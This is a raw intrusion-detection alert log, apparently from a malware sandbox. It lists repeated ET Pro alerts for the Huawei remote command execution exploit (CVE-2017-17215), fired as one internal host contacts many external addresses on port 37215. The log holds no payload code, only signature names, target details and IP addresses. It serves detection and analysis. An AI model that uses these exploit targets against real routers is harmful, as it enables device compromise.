                                            06/14/24-10:44:22.861993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054037215192.168.2.14197.112.205.41
                                            06/14/24-10:44:29.012635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.14156.89.124.235
                                            06/14/24-10:44:00.326317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048237215192.168.2.14156.11.74.143
                                            06/14/24-10:43:41.902160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560837215192.168.2.14156.218.189.164
                                            06/14/24-10:43:43.943550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422437215192.168.2.14156.138.157.207
                                            06/14/24-10:43:45.969226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026637215192.168.2.1441.57.70.239
                                            06/14/24-10:43:54.184678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411837215192.168.2.1441.9.132.12
                                            06/14/24-10:43:54.184954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584437215192.168.2.14156.31.120.246
                                            06/14/24-10:44:35.181087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915837215192.168.2.14197.249.91.139
                                            06/14/24-10:43:52.143131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831437215192.168.2.14156.100.96.148
                                            06/14/24-10:43:37.763576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289237215192.168.2.14156.98.19.152
                                            06/14/24-10:44:02.368264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139437215192.168.2.14156.60.218.144
                                            06/14/24-10:43:58.292945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080837215192.168.2.1441.6.167.101
                                            06/14/24-10:43:36.722463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265437215192.168.2.14156.239.245.97
                                            06/14/24-10:44:31.054839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650437215192.168.2.14156.235.184.227
                                            06/14/24-10:44:04.412062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021637215192.168.2.14197.208.92.112
                                            06/14/24-10:43:34.662438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319637215192.168.2.1441.83.251.197
                                            06/14/24-10:44:12.617751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.14156.1.52.169
                                            06/14/24-10:43:54.198666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833637215192.168.2.14156.250.54.116
                                            06/14/24-10:44:14.669847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075837215192.168.2.14156.134.4.157
                                            06/14/24-10:44:29.025040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146037215192.168.2.1441.213.209.134
                                            06/14/24-10:43:54.201260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583037215192.168.2.14197.168.102.120
                                            06/14/24-10:44:02.384036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458837215192.168.2.14156.92.77.187
                                            06/14/24-10:44:14.668602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077637215192.168.2.14197.207.239.219
                                            06/14/24-10:44:14.671789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.14197.121.74.247
                                            06/14/24-10:44:31.053088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718837215192.168.2.14156.105.114.98
                                            06/14/24-10:43:37.760217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132237215192.168.2.1441.142.237.9
                                            06/14/24-10:44:10.563201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322237215192.168.2.14197.164.118.83
                                            06/14/24-10:44:06.472235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035837215192.168.2.14197.48.81.194
                                            06/14/24-10:44:10.565233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071437215192.168.2.14156.30.25.167
                                            06/14/24-10:43:50.071529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069237215192.168.2.14197.126.107.185
                                            06/14/24-10:44:31.086363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433237215192.168.2.1441.41.164.86
                                            06/14/24-10:44:14.668648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310837215192.168.2.14156.106.135.7
                                            06/14/24-10:44:18.779467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403837215192.168.2.1441.81.139.191
                                            06/14/24-10:44:02.365007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448837215192.168.2.1441.200.149.23
                                            06/14/24-10:44:33.151765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236637215192.168.2.14156.192.20.95
                                            06/14/24-10:43:45.990010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924437215192.168.2.1441.113.180.219
                                            06/14/24-10:44:29.014753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695637215192.168.2.1441.15.232.59
                                            06/14/24-10:44:22.880074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765437215192.168.2.14156.251.186.127
                                            06/14/24-10:44:04.424955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226837215192.168.2.14197.238.180.90
                                            06/14/24-10:43:41.906551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973037215192.168.2.14156.185.146.155
                                            06/14/24-10:44:26.980375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084237215192.168.2.1441.155.243.173
                                            06/14/24-10:43:34.678880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647637215192.168.2.1441.127.142.60
                                            06/14/24-10:44:16.718241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110437215192.168.2.14156.25.206.165
                                            06/14/24-10:43:41.848414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258237215192.168.2.1441.16.169.33
                                            06/14/24-10:44:10.563999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137037215192.168.2.1441.236.9.146
                                            06/14/24-10:44:31.054893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591837215192.168.2.1441.253.207.145
                                            06/14/24-10:43:50.074245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278237215192.168.2.1441.233.165.8
                                            06/14/24-10:43:45.990936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705437215192.168.2.14156.79.171.243
                                            06/14/24-10:43:41.904648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672237215192.168.2.1441.74.248.244
                                            06/14/24-10:43:41.850109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684237215192.168.2.1441.65.51.58
                                            06/14/24-10:44:18.779377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774237215192.168.2.1441.48.74.165
                                            06/14/24-10:44:33.148947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267437215192.168.2.14156.44.38.162
                                            06/14/24-10:43:41.849739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286237215192.168.2.1441.178.3.57
                                            06/14/24-10:43:43.972448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871437215192.168.2.14156.109.221.127
                                            06/14/24-10:44:14.685208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755437215192.168.2.14197.98.202.192
                                            06/14/24-10:44:26.979064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362837215192.168.2.1441.36.37.97
                                            06/14/24-10:44:16.735154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095037215192.168.2.1441.119.80.38
                                            06/14/24-10:43:34.661085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398437215192.168.2.1441.20.102.108
                                            06/14/24-10:43:56.229136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986037215192.168.2.14197.161.142.178
                                            06/14/24-10:43:58.293791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828437215192.168.2.14197.201.226.16
                                            06/14/24-10:43:54.185924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115637215192.168.2.14156.41.250.198
                                            06/14/24-10:44:04.423854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476437215192.168.2.14197.88.0.151
                                            06/14/24-10:43:37.763486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793037215192.168.2.14197.194.176.215
                                            06/14/24-10:44:22.858514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374037215192.168.2.14156.16.102.124
                                            06/14/24-10:43:48.019460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842437215192.168.2.1441.49.233.252
                                            06/14/24-10:44:00.326726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704437215192.168.2.14156.92.99.222
                                            06/14/24-10:44:14.684567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926437215192.168.2.1441.57.39.74
                                            06/14/24-10:44:14.688259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184437215192.168.2.1441.173.201.177
                                            06/14/24-10:44:12.647361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783237215192.168.2.14156.3.149.138
                                            06/14/24-10:44:35.181932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949437215192.168.2.1441.143.14.28
                                            06/14/24-10:43:56.245359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805037215192.168.2.1441.186.153.24
                                            06/14/24-10:43:48.033093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369237215192.168.2.14156.123.79.248
                                            06/14/24-10:44:00.324245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074437215192.168.2.14197.255.216.86
                                            06/14/24-10:43:45.992177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693437215192.168.2.14156.80.90.213
                                            06/14/24-10:43:56.227948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352437215192.168.2.1441.31.40.56
                                            06/14/24-10:44:31.055217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732237215192.168.2.14156.170.123.35
                                            06/14/24-10:44:18.765839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.14156.254.91.56
                                            06/14/24-10:44:31.055042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915637215192.168.2.14197.225.143.22
                                            06/14/24-10:44:33.133912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549037215192.168.2.14197.54.167.18
                                            06/14/24-10:44:33.135053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719837215192.168.2.1441.135.90.158
                                            06/14/24-10:43:50.112097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918037215192.168.2.1441.223.208.251
                                            06/14/24-10:43:54.200578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524837215192.168.2.14156.192.187.153
                                            06/14/24-10:43:34.678282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599637215192.168.2.14197.244.234.190
                                            06/14/24-10:44:16.733467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977237215192.168.2.14156.61.198.211
                                            06/14/24-10:44:14.672068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119637215192.168.2.14156.253.8.94
                                            06/14/24-10:44:14.684021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667037215192.168.2.14197.175.30.107
                                            06/14/24-10:43:36.705628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748437215192.168.2.14197.32.65.176
                                            06/14/24-10:43:39.808782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747437215192.168.2.14197.228.195.149
                                            06/14/24-10:43:54.185164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523837215192.168.2.14156.80.237.154
                                            06/14/24-10:44:18.779329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504437215192.168.2.14197.71.236.101
                                            06/14/24-10:43:36.726923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637837215192.168.2.1441.26.184.134
                                            06/14/24-10:43:45.968236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938237215192.168.2.14156.1.138.14
                                            06/14/24-10:43:36.729929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062237215192.168.2.1441.216.208.178
                                            06/14/24-10:43:41.850730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502037215192.168.2.14156.3.252.137
                                            06/14/24-10:44:14.683192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948437215192.168.2.14156.103.42.103
                                            06/14/24-10:43:34.660836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479637215192.168.2.1441.85.57.174
                                            06/14/24-10:43:36.703177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188237215192.168.2.14156.163.57.134
                                            06/14/24-10:44:04.420838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571837215192.168.2.14156.208.20.159
                                            06/14/24-10:44:10.547651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436037215192.168.2.14156.223.91.27
                                            06/14/24-10:44:02.369329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683037215192.168.2.14156.75.193.112
                                            06/14/24-10:43:43.944606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934237215192.168.2.14197.205.224.159
                                            06/14/24-10:43:36.726155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771837215192.168.2.1441.59.86.136
                                            06/14/24-10:44:04.406904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685437215192.168.2.1441.127.0.148
                                            06/14/24-10:43:36.717895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840437215192.168.2.14156.191.85.116
                                            06/14/24-10:44:33.152358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381237215192.168.2.14156.147.180.77
                                            06/14/24-10:44:22.859467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605237215192.168.2.14156.141.229.150
                                            06/14/24-10:43:41.850615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015037215192.168.2.1441.217.229.115
                                            06/14/24-10:43:58.278071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474837215192.168.2.14197.36.254.242
                                            06/14/24-10:44:29.012961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133637215192.168.2.14197.84.46.51
                                            06/14/24-10:44:06.469590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227037215192.168.2.1441.65.208.160
                                            06/14/24-10:44:02.381828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349837215192.168.2.1441.95.70.146
                                            06/14/24-10:43:37.759929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375237215192.168.2.1441.205.241.159
                                            06/14/24-10:43:39.810139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368837215192.168.2.1441.100.148.228
                                            06/14/24-10:43:48.029735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629437215192.168.2.14156.167.53.177
                                            06/14/24-10:43:36.729792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.14156.188.62.145
                                            06/14/24-10:44:20.804692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512837215192.168.2.1441.33.65.0
                                            06/14/24-10:43:39.810730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175037215192.168.2.1441.209.52.77
                                            06/14/24-10:44:20.805240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710637215192.168.2.14156.133.254.44
                                            06/14/24-10:44:14.686611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467037215192.168.2.1441.12.15.229
                                            06/14/24-10:43:36.701279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6093037215192.168.2.1441.129.100.45
                                            06/14/24-10:43:50.071819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083837215192.168.2.14156.163.66.222
                                            06/14/24-10:43:58.276143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951637215192.168.2.14156.217.234.185
                                            06/14/24-10:44:26.985924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792637215192.168.2.1441.37.73.21
                                            06/14/24-10:44:10.547368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598637215192.168.2.1441.26.198.74
                                            06/14/24-10:44:20.806218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026637215192.168.2.14156.91.142.232
                                            06/14/24-10:44:10.563641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032837215192.168.2.1441.235.226.148
                                            06/14/24-10:43:56.253038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724637215192.168.2.14197.84.225.249
                                            06/14/24-10:43:56.244076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710237215192.168.2.14156.126.142.143
                                            06/14/24-10:44:24.916235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.14156.220.105.17
                                            06/14/24-10:43:56.227718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981037215192.168.2.14197.151.84.214
                                            06/14/24-10:44:20.828057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085637215192.168.2.14197.137.249.249
                                            06/14/24-10:43:36.717397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246437215192.168.2.1441.213.212.237
                                            06/14/24-10:43:52.146071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3496037215192.168.2.1441.152.70.65
                                            06/14/24-10:44:04.421455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946637215192.168.2.14197.97.87.177
                                            06/14/24-10:44:06.472026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707437215192.168.2.1441.20.179.139
                                            06/14/24-10:44:08.503132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574237215192.168.2.14197.34.48.125
                                            06/14/24-10:44:16.717377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208237215192.168.2.14156.222.87.56
                                            06/14/24-10:44:33.134139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419437215192.168.2.1441.148.209.71
                                            06/14/24-10:44:14.669623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650437215192.168.2.1441.108.82.247
                                            06/14/24-10:44:20.804781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5444237215192.168.2.14197.163.99.28
                                            06/14/24-10:43:52.146587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065837215192.168.2.14156.74.196.151
                                            06/14/24-10:43:54.202837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934637215192.168.2.14156.227.192.213
                                            06/14/24-10:44:16.715940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795437215192.168.2.14197.58.117.7
                                            06/14/24-10:44:12.643489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817637215192.168.2.14156.244.65.55
                                            06/14/24-10:44:18.765315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471837215192.168.2.14197.229.89.166
                                            06/14/24-10:43:54.201709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167237215192.168.2.14156.2.111.195
                                            06/14/24-10:44:12.625474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129637215192.168.2.14197.113.160.52
                                            06/14/24-10:43:39.792859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218037215192.168.2.14156.42.57.150
                                            06/14/24-10:43:58.294034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953037215192.168.2.14156.176.84.128
                                            06/14/24-10:44:31.086165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758437215192.168.2.14156.118.197.140
                                            06/14/24-10:43:36.705504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679437215192.168.2.14197.78.103.253
                                            06/14/24-10:44:02.365982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927637215192.168.2.14197.182.158.150
                                            06/14/24-10:43:43.941112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266837215192.168.2.14156.129.234.6
                                            06/14/24-10:43:36.704931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524437215192.168.2.14156.175.5.233
                                            06/14/24-10:43:45.967678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849437215192.168.2.14197.234.128.75
                                            06/14/24-10:44:18.763816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621837215192.168.2.1441.55.170.249
                                            06/14/24-10:43:39.793133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658037215192.168.2.14156.198.114.147
                                            06/14/24-10:44:06.470857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181837215192.168.2.1441.251.10.220
                                            06/14/24-10:43:56.253131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367637215192.168.2.14156.36.87.208
                                            06/14/24-10:44:02.364802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728037215192.168.2.14197.18.141.140
                                            06/14/24-10:44:02.382589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132637215192.168.2.1441.211.54.81
                                            06/14/24-10:44:12.614066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364837215192.168.2.14197.108.254.110
                                            06/14/24-10:43:34.663685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233237215192.168.2.14197.160.179.42
                                            06/14/24-10:44:08.519435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199637215192.168.2.14156.250.145.229
                                            06/14/24-10:44:18.777981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065237215192.168.2.14197.118.180.250
                                            06/14/24-10:44:02.386207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918437215192.168.2.14156.222.100.132
                                            06/14/24-10:44:29.012372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.1441.143.169.30
                                            06/14/24-10:44:12.625172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135437215192.168.2.1441.51.22.217
                                            06/14/24-10:43:56.230522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297637215192.168.2.14156.189.173.227
                                            06/14/24-10:43:56.225734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103237215192.168.2.14156.199.212.245
                                            06/14/24-10:43:34.663450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823637215192.168.2.14156.235.113.156
                                            06/14/24-10:44:24.915208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632837215192.168.2.14156.58.247.86
                                            06/14/24-10:43:52.146503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660037215192.168.2.14156.220.38.103
                                            06/14/24-10:44:33.151443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.1441.195.134.39
                                            06/14/24-10:43:48.032595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055837215192.168.2.14156.186.77.67
                                            06/14/24-10:43:54.185843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969637215192.168.2.14156.185.20.167
                                            06/14/24-10:43:43.943502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871237215192.168.2.1441.206.16.122
                                            06/14/24-10:43:48.015859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709437215192.168.2.1441.74.193.205
                                            06/14/24-10:44:10.564279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606437215192.168.2.14197.235.221.75
                                            06/14/24-10:43:34.679416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371437215192.168.2.14197.99.61.27
                                            06/14/24-10:44:22.860010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492437215192.168.2.1441.109.95.11
                                            06/14/24-10:44:16.734996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821237215192.168.2.14156.86.111.92
                                            06/14/24-10:44:20.807655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008037215192.168.2.14156.163.143.182
                                            06/14/24-10:44:02.386232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551037215192.168.2.14156.189.84.115
                                            06/14/24-10:43:50.072832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756637215192.168.2.1441.36.215.134
                                            06/14/24-10:43:54.202949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826837215192.168.2.14156.153.49.153
